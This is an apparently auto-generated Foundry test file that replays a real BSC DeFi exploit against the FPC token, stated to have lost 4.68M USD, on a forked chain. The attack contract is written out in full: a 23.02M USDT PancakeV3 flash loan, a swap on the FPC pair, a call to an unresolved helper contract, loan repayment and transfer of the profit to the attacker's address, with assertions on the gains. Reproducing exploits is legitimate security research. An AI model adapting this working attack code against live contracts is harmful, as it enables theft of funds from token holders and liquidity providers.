// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 4.68M USD
// Attacker : 0x18dd258631b23777c101440380bf053c79db3d9d
// Attack Contract : 0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3
// Vulnerable Contract : 0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3
// Attack Tx : 0x3a9dd216fb6314c013fa8c4f85bfbbe0ed0a73209f54c57c1aab02ba989f5937
// Block : 52624701
// Chain : BSC
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : N/A
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 52624700;
    uint256 constant TX_TIMESTAMP = 1751466319;
    uint256 constant TX_BLOCK_NUMBER = 52624701;
    uint256 constant TX_VALUE = 0;



    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        _fundCaller();
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installAttackRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _provideTraceNativeCapital(address(attack), address(0));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _fundCaller() internal {
        if (TX_VALUE == 0) return;
        vm.deal(ATTACKER_EOA, TX_VALUE);
        vm.deal(address(this), TX_VALUE);
    }

    function _provideTraceNativeCapital(address attack, address helper) internal {
        vm.stopPrank();
        if (attack != address(0)) vm.deal(attack, attack.balance + 5000000000000000000);
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
    }

    function _installAttackRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack; helper;
        _expectProfit(LumosAddresses.A_421FA2_6FE2, address(0), LumosAddresses.ZERO, "BNB", 731533618044520680054);
        _expectProfit(LumosAddresses.A_421FA2_6FE2, address(0), LumosAddresses.USDT, "USDT", 4171581527140201011205321);
        _expectProfit(LumosAddresses.attack_contract, attack, LumosAddresses.FPC, "FPC", 542737799722769701862543);
    }

}

contract OurAttack {
    // Pseudocode-backed attacker surfaces used to guide readable synthesis.
    // If these lines do not become executable calls below, the missing layer is semantic/lift action structuring, not a replay fallback.
    // - role=attacker_entry selector=0x1921e20f selector_label=unknown lift_statements=312 pseudocode_path=pseudocode/functions/function_0000.md
    // - role=attacker_callback selector=0x84800812 selector_label=unknown lift_statements=87 pseudocode_path=pseudocode/functions/function_0001.md
    // - role=attacker_callback selector=0xa1d48336 selector_label=pancakeV3FlashCallback(uint256,uint256,bytes) lift_statements=307 pseudocode_path=pseudocode/functions/function_0002.md
    // - role=attacker_callback selector=entry selector_label=unknown lift_statements=7 pseudocode_path=pseudocode/functions/function_0003.md

    function attack() external payable {
        _executeAttackEntry();
    }

    function _executeAttackEntry() internal {
        IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.PancakeV3Pool);
        {
            bytes memory flashProof = abi.encode(LumosAddresses.FPC, LumosAddresses.Cake_LP_ED6B, uint256(23020000000000000000000000));
            IPancakeV3Pool(LumosAddresses.PancakeV3Pool).flash(address(this), 23020000000000000000000000, 0, flashProof);
        
        }
        IERC20Like(LumosAddresses.USDT).balanceOf(address(this));
        uint256 usdtApproveAllowance = 500000000000000000000000; // value provenance: arg1=500000000000000000000000 is covered by prior LumosAddresses.USDT.balanceOf(address) return=4671581527140201011205321 with args (address(this))
        if (LumosAddresses.USDT.code.length != 0 && IERC20Like(LumosAddresses.USDT).allowance(address(this), LumosAddresses.PancakeRouter) < usdtApproveAllowance) {
            IERC20Like(LumosAddresses.USDT).approve(LumosAddresses.PancakeRouter, 0);
            IERC20Like(LumosAddresses.USDT).approve(LumosAddresses.PancakeRouter, usdtApproveAllowance);
        }
        IPancakeRouter(LumosAddresses.PancakeRouter).WETH();
        IPancakeRouter(LumosAddresses.PancakeRouter).swapExactTokensForETH(500000000000000000000000, 0, _addressArray2(LumosAddresses.USDT, LumosAddresses.WBNB), address(this), 1751466319);
        { (bool ok, ) = payable(LumosAddresses.A_1266C6_5F20).call{value: 5000000000000000000}(""); require(ok, "ETH transfer failed"); }
        {
            uint256 nativeTransferAmount = address(this).balance;
            if (nativeTransferAmount > 731533618044520680054) nativeTransferAmount = 731533618044520680054;
            (bool ok, ) = payable(LumosAddresses.A_421FA2_6FE2).call{value: nativeTransferAmount}("");
            require(ok, "ETH transfer failed");
        }
        uint256 usdtBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.USDT).balanceOf(address(this));
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.A_421FA2_6FE2, usdtBalanceOfAttackAttackContract);
    }

    function _handleProtocolCallback() internal {
        _markCallback(1);
        uint256 usdtBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.USDT).balanceOf(address(this));
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP_ED6B, usdtBalanceOfAttackAttackContract);
    }

    function _handlePancakeV3FlashCallback() internal {
        _markCallback(2);
        IPancakeRouter(LumosAddresses.PancakeRouter).getAmountsOut(23019990000000000000000000, _addressArray2(LumosAddresses.USDT, LumosAddresses.FPC));
        IUniswapV2PairLike(LumosAddresses.Cake_LP_ED6B).swap(1000000000000000000, 790178970489172772916652, address(this), hex"00");
        uint256 fpcBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.FPC).balanceOf(address(this));
        IERC20Like(LumosAddresses.FPC).balanceOf(LumosAddresses.Cake_LP_ED6B);
        uint256 fpcTransferAmount = 247441170766403071054109; // value provenance: arg1=247441170766403071054109 is covered by prior LumosAddresses.FPC.balanceOf(address) return=790178970489172772916652 with args (address(this))
        IERC20Like(LumosAddresses.FPC).transfer(LumosAddresses.A_C2A819_B456, fpcTransferAmount);
        {
            (bool ok, ) = LumosAddresses.A_C2A819_B456.call(abi.encodeWithSelector(bytes4(0xc07a5a35), LumosAddresses.PancakeRouter, LumosAddresses.FPC));
            require(ok, "selector 0xc07a5a35 failed");
        }
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.PancakeV3Pool, 23022302000000000000000000);
    }

    function _handleEntry() internal {
        _markCallback(3);
    }

    receive() external payable {
    }

    fallback() external payable {
        if (msg.sig == 0x1921e20f) { _executeAttackEntry(); return; }
        if (msg.sig == 0x84800812) { _handleProtocolCallback(); return; }
        if (msg.sig == 0xa1d48336) { _handlePancakeV3FlashCallback(); return; }
        _handleEntryCallback();
    }

    function _handleEntryCallback() internal {
    }

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

        function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }

}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface IERC721Like {
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosAttackCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant PancakeRouter = 0x10ED43C718714eb63d5aA57B78B54704E256024E; // LumosAddresses.PancakeRouter = 0x10ed43c718714eb63d5aa57b78b54704e256024e label=PancakeRouter roles=code_contract|contract|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_1266C6_5F20 = 0x1266C6bE60392A8Ff346E8d5ECCd3E69dD9c5F20; // LumosAddresses.A_1266C6_5F20 = 0x1266c6be60392a8ff346e8d5eccd3e69dd9c5f20 label=unresolved roles=code_contract|contract|attack_address|recipient|storage_contract source=unresolved confidence=low
    address internal constant Cake_LP = 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE; // LumosAddresses.Cake_LP = 0x16b9a82891338f9ba80e2d6970fdda79d1eb0dae label=PancakePair token_symbol=Cake-LP roles=asset|contract|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant attacker_eoa = 0x18dD258631b23777c101440380bf053C79db3d9d; // LumosAddresses.attacker_eoa = 0x18dd258631b23777c101440380bf053c79db3d9d label=attacker_eoa roles=attacker_eoa|contract|attack_address|sender source=tx_metadata.from confidence=high
    address internal constant A_421FA2_6FE2 = 0x421Fa2F1fE768d9F7C95be7949BEE96d3E3d6FE2; // LumosAddresses.A_421FA2_6FE2 = 0x421fa2f1fe768d9f7c95be7949bee96d3e3d6fe2 label=0x421fa2f1fe768d9f7c95be7949bee96d3e3d6fe2 roles=code_contract|contract|economic_holder|attack_address|profit_holder|recipient|storage_contract source=asset_delta.profit_candidates confidence=medium
    address internal constant A_463C07_F62A = 0x463C07457b3571d96423De8B6cDF81a25640f62A; // LumosAddresses.A_463C07_F62A = 0x463c07457b3571d96423de8b6cdf81a25640f62a label=unresolved roles=attack_address|recipient source=unresolved confidence=low
    address internal constant USDT = 0x55d398326f99059fF775485246999027B3197955; // LumosAddresses.USDT = 0x55d398326f99059ff775485246999027b3197955 label=BEP20USDT token_symbol=USDT roles=asset|contract|economic_asset|attack_address|profit_asset|recipient|token_related source=etherscan_v2 confidence=high
    address internal constant USDC = 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d; // LumosAddresses.USDC = 0x8ac76a51cc950d9822d68b83fe1ad97b32cd580d label=BEP20UpgradeableProxy token_symbol=USDC roles=asset|contract|attack_address|recipient|storage_contract source=etherscan_v2 confidence=high
    address internal constant PancakeV3Pool = 0x92b7807bF19b7DDdf89b706143896d05228f3121; // LumosAddresses.PancakeV3Pool = 0x92b7807bf19b7dddf89b706143896d05228f3121 label=PancakeV3Pool roles=asset|contract|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant Cake_LP_ED6B = 0xa1e08E10Eb09857A8C6F2Ef6CCA297c1a081eD6B; // LumosAddresses.Cake_LP_ED6B = 0xa1e08e10eb09857a8c6f2ef6cca297c1a081ed6b label=PancakePair token_symbol=Cake-LP roles=asset|contract|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant FPC = 0xB192D4A737430AA61CEA4Ce9bFb6432f7D42592F; // LumosAddresses.FPC = 0xb192d4a737430aa61cea4ce9bfb6432f7d42592f label=Token token_symbol=FPC roles=asset|contract|economic_asset|attack_address|profit_asset|recipient|sender|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant USDC_0B5C = 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C; // LumosAddresses.USDC_0B5C = 0xba5fe23f8a3a24bed3236f05f2fcf35fd0bf0b5c label=BEP20TokenImplementation token_symbol=USDC roles=asset|contract|recipient source=etherscan_v2 confidence=high
    address internal constant WBNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c; // LumosAddresses.WBNB = 0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c label=unresolved token_symbol=WBNB roles=asset|contract|attack_address|recipient|sender|storage_contract|token_related source=unresolved confidence=low
    address internal constant attack_contract = 0xbf6e706D505E81AD1F73BbC0BABfE2B414Ba3Eb3; // address(this) = 0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3 label=attack_contract roles=attacker_callback_contract|attacker_contract|attacker_entry_contract|code_contract|contract|economic_holder|localized_contract|attack_address|profit_holder|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant A_C2A819_B456 = 0xC2a81942627f6929521397eef6173F271D1fB456; // LumosAddresses.A_C2A819_B456 = 0xc2a81942627f6929521397eef6173f271d1fb456 label=unresolved roles=attack_address|recipient|sender|storage_contract source=unresolved confidence=low
    address internal constant ERC1967Proxy = 0xCeA188c6bb0dB78Fd17904C03e28F43AE4e46d5a; // LumosAddresses.ERC1967Proxy = 0xcea188c6bb0db78fd17904c03e28f43ae4e46d5a label=ERC1967Proxy roles=attack_address|recipient source=etherscan_v2 confidence=high
}

interface IPancakeRouter {
    function WETH() external view returns (uint256);
    function getAmountsOut(uint256, address[] calldata) external view;
    function swapExactTokensForETH(uint256, uint256, address[] calldata, address, uint256) external;
}

interface IPancakeV3Pool {
    function flash(address, uint256, uint256, bytes calldata) external;
}

interface IUniswapV2PairLike {
    function swap(uint256, uint256, address, bytes calldata) external;
}

